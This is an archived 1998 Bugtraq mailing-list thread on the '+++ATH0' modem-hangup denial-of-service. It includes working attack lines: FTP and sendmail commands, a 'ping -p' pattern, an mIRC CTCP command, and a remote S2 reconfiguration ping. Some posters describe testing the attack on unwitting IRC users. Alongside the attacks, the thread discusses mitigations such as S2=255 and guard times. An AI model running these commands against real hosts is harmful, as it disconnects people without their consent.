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packetstormPacket StormPACKETSTORM:15217
HistoryAug 17, 1999 - 12:00 a.m.


Packet Storm
`Date: Sun, 27 Sep 1998 13:52:33 -0400  
From: "Max Schau (Noc-Wage)" <[email protected]>  
Subject: 1+2=3, +++ATH0=Old school DoS  
Prepared by Noc-Wage (Max Schau, M.C.S.R)  
Brought to you by the wonderful people of #hackers undernet and M.C.S.R  
All OS's using a dial-up connection are at risk.  
This is an old exploit, but there has been nothing done to get rid of  
it, so maybe bringing it to everyone's attention (as I am not aware of a  
"formal" release explaining the exploit exsisting) might get something  
done, or atleast raise awareness.  
Originally brought to my attention by nak, and maffew "s2=255 Fix"  
to my attention by SuiDRoot and Sygma within minutes of each other. (I  
overlooked checking modem manuals) Also thanks to Defraz, DrSmoke and  
zerox (swab) for allowing me to bounce ideas off them and for  
ideas to the project. Thanks go out to the rest of the people in  
for allowing me to keep bugging them about various standards and other  
boring things.  
Maybe this will even make you remember the good old days of the  
90s and BBS's ;)  
Most modems today follow the Hayes Command set (ATZ, ATDT, ATH0..)  
Unfortunately the way that these modems handle certain strings leaves  
susceptible to a specific type of DoS attack. By forcing the victim to  
respond with the string "+++ATH0" many brands of modems will interpret  
+++ATH0 as the user manually attempting to enter command mode and  
a command. Because of this, when the victim attempts to respond with  
+++ATH0 the modem sees it within the IP datagram and hangs up the modem.  
**Not all modems are effected**  
Some, such as the U.S. Robotics, 33.6 type modems require that there be  
pause of a about a second where no text is sent preceding the +++ before  
going into command mode. This makes it impossible to force the modem to  
hang up since there is no way to get the victim machine to reply with  
without data immediately following. This is because PPP Frames have data  
after the IP datagram, so if you some how managed to make the victim  
with a damaged IP datagram that had +++ as the last three values, the  
following end of the PPP frame would be the data which made the modem  
ignore the +++.  
An example of a possible attack follows:  
(IP addresses have been changed for obvious reasons)  
[wage@koroshiya /]$ telnet 21  
Connected to  
Escape character is '^]'.  
220 foo FTP server (Version wu-2.4.2-academ[BETA-15](1) Fri Dec 12  
USER +++ATH0  
telnet> close  
Connection closed.  
[wage@koroshiya wage]$ telnet 21  
telnet: Unable to connect to remote host: Network is unreachable  
[wage@koroshiya wage]$  
Modems known to be affected:  
Logicode 28.8  
Supra 33.6 (internal)  
Diamond Supra v.90  
Many more but this is all we had available.  
All of the USR modems we tested against were not effected, but most  
brands ARE.  
On some machines the process (such as ftpd or sendmail) which the  
connected too does not realise the connection has been lost, this can  
result on a seemingly random disconnect after reconnecting.  
PPP does NOT compress the IP datagram by default, thus the ip datagram  
contained within the PPP frame will be exactly the same. Thus if the IP  
datagram contains "+++ATH0" the modem will receive the string exactly as  
Two ways to cause the victim to "send" you the +++ATH0 are to:  
1) Connect to sendmail (does not work with qmail) do "HELO"  
Then type "VRFY +++ATH0", normally it would say:  
550 +++ATH0... User unknown, but because their modem interprets  
the +++ATH0 the modem is hung up.  
2) Connect to FTP and type "USER +++ATH0". Normally it would respond:  
331 Password required for +++ATH0. But because the modem sees the  
+++ATH0 it disconnects.  
As you can see it is very simple, and millions of different ways can  
easily be found to generate the same result. For the sake of annoying  
script kiddies I'm not going to put the wonderful IRC command, but if  
use your brain you can figure it out easy enough.  
Of course, this attack is very similar to a pipe bomb. Sometimes it  
works, sometimes it doesn't, and sometimes it blows up in your face. If  
your modem is effected by this attack then that means that if you try  
attack there is a chance you will be disconnected. When you send the  
+++ATH0 your modem will ALSO see it. There are ways around this such as  
attacking from server on a connection such a ISDN, cable modem...  
To protect yourself add in your modem initialization string "s2=255"  
will disable the modem's ability to go into command mode. (Can cause  
problems for some people). What s2 does is change the character which  
used to enter command mode. Normally any value over 127 disables the  
ability to manually enter command mode but in some cases it requires a  
higher number, to be sure just put 255.  
Greetings go out to: Humble (horizon), Hey! e-mail me! Colon\\`Q in  
#hackers: SuIDRoot, halt, EpiC, DrSmoke, Defraz, WorldWide(did I  
iCBM, trix, anacarda, nak, swab/zerox, awgn #snickers: Sygma, Sheenie,  
RedBull, n`tropy, un-saad, Hole(Geez, you'd think I won an Oscar) From  
home town of Milton: AsH, Nullifier(Alex H.) MCSR: AsH, CONGO  
Now following is MrPhoenix's way of getting the same result WITHOUT  
needing to connect. He uses PING packets to get the same result of  
forcing the victim to respond with the string.  
Here is what he sent me:  
+++ATH0 Ping exploit  
Ping modem killer by MrPhoenix ([email protected]).  
This is a simple exploit for the +++ATH0 bug contained in Noc-Wage's  
Affected: All modems w/o the requirement of a 500msec or more idle  
after the +++ command, connected with a PPP connection w/o  
Some ways of making a modem to hung up were introduced by Noc-Wage by  
using the sendmail or ftp daemon, or even an IRC connection. But there  
a simplest way without requiring the existence of an active daemon or an  
IRC connection. You can send an ICMP ECHO_REQUEST to the target to  
ICMP ECHO_RESPONSE, and fill the packet with the +++ATH0<CR> characters.  
The <CR> might help in some modems which require the ATH0 command to be  
followed by carriage return. So the target gets the ICMP ECHO_REQUEST  
sends the ICMP ECHO_REPLY to you with the same data of the ICMP  
ECHO_REQUEST packet. This way the modem reads the +++, goes to command  
mode, then reads the command ATH0, and closes the connection.  
To make the above happen you can either make your own program to send  
required packet, or use the ping program with the *wonderful* option  
with which you can specify up to 16 bytes to fill out the packet to  
The "-p" option requires the pattern to be entered in hex digits. The  
equivalent of the '+++ATH0<CR>' string in hex is: 2b2b2b415448300d .  
The complete command is : ping -p 2b2b2b415448300d <target>  
*NOTE*: The "-p" option is not supported by the"ping" program from  
Microsoft shiped with MS-Windows.  
Here is an example:  
[root@narf ath0]# ping -p 2b2b2b415448300d -c 5  
PATTERN: 0x2b2b2b415448300d  
PING ( 56 data bytes  
--- ping statistics ---  
5 packets transmitted, 0 packets received, 100% packet loss  
[root@narf ath0]#  
That's what you'll get if it modem closes the connection. I send 5  
just to make sure because sometimes 1-2 packets might not work.  
Here is what you'll get if the bug doesn't work:  
[root@narf ath0]# ping -p 2b2b2b415448300d -c 5  
PATTERN: 0x2b2b2b415448300d  
PING ( 56 data bytes  
64 bytes from icmp_seq=0 ttl=252 time=182.4 ms  
64 bytes from icmp_seq=1 ttl=252 time=190.1 ms  
64 bytes from icmp_seq=2 ttl=252 time=190.1 ms  
64 bytes from icmp_seq=3 ttl=252 time=190.1 ms  
64 bytes from icmp_seq=4 ttl=252 time=180.1 ms  
--- ping statistics ---  
5 packets transmitted, 5 packets received, 0% packet loss  
round-trip min/avg/max = 180.1/186.5/190.1 ms  
[root@narf ath0]#  
To protect yourself you can disable the +++ command by setting the S2  
register to 255 (the easy way), or by patching your kernel to drop the  
incoming packets containing the "+++ATH0" string (the hard way).  
Greetings to: everybody in #grhack,  
zerox who helped me find this exploit,  
Noc-Wage, nac, maffew and everybody else in #hackers  
all the Greek hackers.  
Date: Sun, 27 Sep 1998 23:27:34 -0600  
From: Brett Glass <[email protected]>  
Subject: Re: 1+2=3, +++ATH0=Old school DoS  
I'm not entirely sure that these "kidz" quite understand what's going on  
here, so it probably pays to elucidate a bit.  
Some time ago, Hayes Microcomputer Products got a patent -- known as the  
"Heatherington patent" -- on its method of doing modem escape sequences.  
The patent was a "submarine" patent -- that is, one that issues long after  
others in the industry have begun using the same technique or technology --  
and was bitterly disputed by other modem vendors, who didn't want to pay  
money to Hayes. However, Hayes gradually one most of the lawsuits due to  
deep pockets, clever lawyers, and the idiosyncrasies of the patent system.  
The patent involved the timing of the escape sequence: The characters "+++"  
followed by a 1-second pause. To get around the patent, some modem vendors  
simply eliminated the pause, so that the sequence +++AT would bring the  
modem back to command mode in all cases.  
Hayes, bitter about not being paid royalties by these vendors, sabotaged  
its own press releases by placing the characters "+++ATH0" at the top of  
each document and then circulating them widely. (The idea, I suppose, was  
to make the press believe that other brands of modems were not reliable.) I  
exposed this primitive denial of service attack in my InfoWorld column in  
Eventually, modem chip vendors licensed the patent, so that modem  
manufacturers didn't need to anymore. At that point, the whole issue became  
moot and the production of modems that didn't require a pause after the  
"+++" stopped.  
Today, it's rare to find a modem that responds to the attack unless there  
happens to be a long pause in the data stream after the "+++". Most ISPs  
program their modems to ignore the "+++" sequence, and so make their modems  
immune to it. You can, too, by setting the proper "S-register" on your  
modem. (You can still hang up the modem by dropping the DTR line, as  
virtually all communications programs do nowadays.)  
Therefore, this DoS attack isn't a big deal. It's easily preventable,  
rarely effective, and relatively harmless (all you have to do, if it hits,  
is redial).  
--Brett Glass  
Date: Mon, 28 Sep 1998 01:24:03 -0500  
From: Daniel Hauck <[email protected]>  
Subject: Re: 1+2=3, +++ATH0=Old school DoS  
[ The following text is in the "iso-8859-1" character set. ]  
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With all due respect to you and your prior efforts, I will also add that I  
tested the attack against a random channel on IRC and I downed about 33-40%  
of the victims tested against.  
In spite of what you are mentioning, it seems apparent that the folks at  
Rockwell did not purchase the patent...and Rockwell chipset modems are quite  
popular these days. My own dialup modem was suseptable to the attack (ref:  
the pipebomb blew up in my face.) until I fixed that. The stuff at work was  
also Rockwell based until I fixed it. The results are surprisingly good.  
Though it's an old attack (from way back in the BBS days) it's still quite  
--my 2 cents.  
Date: Mon, 28 Sep 1998 02:36:40 -0400  
From: Pete Gonzalez <[email protected]>  
Subject: Re: 1+2=3, +++ATH0=Old school DoS  
> At that point, the whole issue became moot and the production of modems  
> that didn't require a pause after the "+++" stopped.  
> Today, it's rare to find a modem that responds to the attack unless there  
> happens to be a long pause in the data stream after the "+++". Most ISPs  
> program their modems to ignore the "+++" sequence,  
I have a Diamond SupraExpress 56k modem (purchased a month ago) which  
dials an Erol's account. I tried the exploit posted by Max Schau, and it  
worked first try.  
Also, it occurs to me that this vulnerability could possibly be used to  
make the person's modem hang up and dial 911. :-)  
Date: Mon, 28 Sep 1998 00:02:32 -0700  
From: kill9 <[email protected]>  
Subject: Re: 1+2=3, +++ATH0=Old school DoS  
On Sun, 27 Sep 1998, Brett Glass wrote:  
> Today, it's rare to find a modem that responds to the attack unless there  
> happens to be a long pause in the data stream after the "+++".  
> Therefore, this DoS attack isn't a big deal. It's easily preventable,  
> rarely effective, and relatively harmless (all you have to do, if it hits,  
> is redial).  
> --Brett Glass  
I have tested this out here locally, as well as with the help from a few  
other people onlin and it seems that 6 of 9 modems have been affected. I  
would hardly call that 'rarely effective', relatively harmless yes, but  
it seems to be a large percentage. I am interested to see more results  
as too how wide spread this is.  
(all tests were done using ping -p 2b2b2b415448300d host )  
Date: Mon, 28 Sep 1998 20:48:08 +1000  
From: Ross Wheeler <[email protected]>  
Subject: Re: 1+2=3, +++ATH0=Old school DoS  
On Mon, 28 Sep 1998, kill9 wrote:  
> On Sun, 27 Sep 1998, Brett Glass wrote:  
> > Today, it's rare to find a modem that responds to the attack unless there  
> > happens to be a long pause in the data stream after the "+++".  
> ...  
> > Therefore, this DoS attack isn't a big deal. It's easily preventable,  
> > rarely effective, and relatively harmless (all you have to do, if it hits,  
> > is redial).  
> >  
> > --Brett Glass  
> >  
> I have tested this out here locally, as well as with the help from a few  
> other people onlin and it seems that 6 of 9 modems have been affected. I  
> would hardly call that 'rarely effective', relatively harmless yes, but  
> it seems to be a large percentage. I am interested to see more results  
> as too how wide spread this is.  
This was widespread when I was involved in Fidonet. There are two good  
cures, depending on the modems you use.  
1. Make sure you have a guard time of at least a second.  
Due to licensing restrictions, not all modems implement guard times  
which is why the problem came about in the first place.  
2. Change the escape lead-in sequence to something that's NOT "+++"  
Most modems will take any character with a decimal number >128  
as a DISABLE, and will therefore "prevent" this DoS by ensuring  
an on-line modem never gets the escape lead-in in the first place.  
Even if your modem doesn't disable, you can pick some obscure code  
as an escape character. Don't use things that are likely to occur  
in normal use, like " " or "---" etc!  
There was an e-mail exploit some time back (12 months or more) that used  
exactly the same DoS to hang peoples mail, but simply including the  
string "+ + + ATH0" (without the spaces) in an e-mail message. When a  
vulnerable modem attempted to send the text, it went off-line immediately.  
Date: Mon, 28 Sep 1998 04:49:14 -0500  
From: Kevin Day <[email protected]>  
Subject: Re: 1+2=3, +++ATH0=Old school DoS  
> On Sun, 27 Sep 1998, Brett Glass wrote:  
> > Today, it's rare to find a modem that responds to the attack unless there  
> > happens to be a long pause in the data stream after the "+++".  
> ...  
> > Therefore, this DoS attack isn't a big deal. It's easily preventable,  
> > rarely effective, and relatively harmless (all you have to do, if it hits,  
> > is redial).  
> >  
> > --Brett Glass  
> >  
> I have tested this out here locally, as well as with the help from a few  
> other people onlin and it seems that 6 of 9 modems have been affected. I  
> would hardly call that 'rarely effective', relatively harmless yes, but  
> it seems to be a large percentage. I am interested to see more results  
> as too how wide spread this is.  
> (all tests were done using ping -p 2b2b2b415448300d host )  
> kill9  
In doing some testing here on willing victims.... 30% seemed vulnerable with  
the ping -p attack.  
For IRC users:  
//raw NOTICE ToastyMan : $+ $chr(1) $+ PING +++ATH0 $+ $chr(1)  
(in mirc)  
Also seems to work, and will work through bnc's or whatever proxy you are  
going through, since it's part of the irc protocol..... This only worked on  
one user though.  
So far, A/Open(acer) 56k's were the most common modem that was vulnerable. (3 of  
the 6 tested that were vulnerable were using those modems)  
I'm working on a 'For Dummies' program that will scan your system for  
modems, and ATZ ATS2=255&W Hopefully this'll be fixed. I'll release it  
tommorow, and post it here if Aleph doesn't mind.  
Kevin Day  
Date: Mon, 28 Sep 1998 06:58:13 -0700  
From: Tudor Bosman <[email protected]>  
Subject: Re: 1+2=3, +++ATH0=Old school DoS  
One other possible fix would be to set your modem's escape character to  
something other than +, especially a control character (ASCII code  
0x00-0x1f), and then escape it using PPP's asyncmap option.  
Tudor Bosman  
E-mail: [email protected] Phone: *NEW!* (626) 683-8055 *NEW!*  
Address: Caltech MSC #345, Pasadena, CA 91126-0345, USA  
Date: Mon, 28 Sep 1998 09:13:28 -0400  
From: Quantum Technical Support <[email protected]>  
Subject: Re: 1+2=3 +++ATH0=Old school DoS  
Quick note, I tried this on a Noblelink 56k Plug and Play, and it was  
successful, 3 for 3.  
Tried it on 3 different USR modems - Internal Sportster v.90, External  
Sportster v.90, Internal Sportster x2. All failed.  
A Zoom Internal 56kflex/v.90 (model 2812?) was successful.  
It appears that the problem may be exclusive to Rockwell and Lucent chipset  
modems, but I haven't tested it enough to be sure.  
Date: Mon, 28 Sep 1998 03:52:40 -0400  
From: John M. Flinchbaugh <[email protected]>  
Subject: Re: 1+2=3, +++ATH0=Old school DoS  
On Mon, 28 Sep 1998, Pete Gonzalez wrote:  
> Also, it occurs to me that this vulnerability could possibly be used to  
> make the person's modem hang up and dial 911. :-)  
this could be a real problem. one of the early reports stated that the  
attacker managed to take down 30-40% of an irc channel, correct? so it  
seems to be a bit widespread.  
this could be used to make the modem dial those long-distance  
international pay numbers and such.  
and another observation i've noticed in testing this attack. the victim  
machine attampts to send the hangup string, drops it's network connection,  
and the response fails to get back to the attacking host. upon redialing,  
the response is again sent when it tries to flush that connection, and the  
modem goes offline yet again. i do not know off hand how long it will do  
this, but i witnessed a machine redial nearly 10 times before i finally  
just offlined my own computer, so it would not find me and try to send it  
another possibility in this little attack would be to reconfigure the  
modem, save the new settings, and online the modem again. could you see a  
dial up client being reconfigured to max out at a 2400 baud connection? :)  
____________________}John Flinchbaugh{______________________  
| -> [email protected] <- [email protected] |  
| [email protected] |  
~Powered by Linux: Reboots are for hardware upgrades only  
Date: Mon, 28 Sep 1998 13:29:06 -0500  
From: Adrian Gonzalez <[email protected]>  
Subject: Re: 1+2=3, +++ATH0=Old school DoS  
We're and ISP and have several dedicated customers over ISDN lines, using TA's  
such as the Motorola Bitsurfr Pro and the 3com Impact IQ.  
So far, I didn't find either of these ISDN modems to be vulnerable, but while  
testing, I came up with the idea of using this 'feature' to 'patch' a  
vulnerable modem:  
ping -c 1 -p 2b2b2b415453323d32353526574f310d host  
this sends a single packet with the string + + + ATS2=255&WO1 (No spaces, of  
course) to the host, which changes the escape char remotely. It also sends  
the O1 command, which is supposed to bring the modem out of command mode and  
maintain the connection, however, I found that most modems just hung up,  
possibly because of the &w command.  
Why is this useful? Well I've used it to remotely patch the modems of several  
customers which have dedicated analog lines with us.  
6 of the 11 modems I tested were vulnerable, the patch worked on all 6, but  
only 2 of them were able to maintain the connection after the &w.  
I tested 2 Terminal adapters, neither were vulnerable.  
-Adrian Gonzalez  